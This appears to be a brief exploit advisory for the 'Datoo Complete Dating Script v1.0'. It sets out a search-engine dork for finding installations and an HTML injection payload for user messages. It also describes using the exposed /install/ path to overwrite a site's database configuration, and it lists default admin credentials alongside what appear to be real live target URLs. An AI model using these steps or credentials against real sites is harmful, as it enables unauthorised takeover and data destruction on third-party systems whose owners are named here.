====================================================================================================================================
| # Title : Datoo - Complete Dating Script v1.0 HTML CODE Inject Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : v1.0 |
| # Vendor : http://www.codelist.cc/scripts/232821-datoo-v10-complete-dating-script.html |
| # Dork : http://nelliwinne.net/ |
====================================================================================================================================
poc :
HTML CODE inject :
[+] Dorking İn Google Or Other Search Enggine .
[+] create a new use and after login go messages and pastehtml code .
[+] use payload :
</tr>
<td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>
Disconnect the database :
[+] use path : /install/
after adding the path they give you page to enter database configuration .
you can type any thing or press install script.
https://wzy.ro/install/
backdoor account :
https://www.lifeisnowbrasil.com.br/admin/dashboard.php
user : admin@admin.com
pass : admin
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================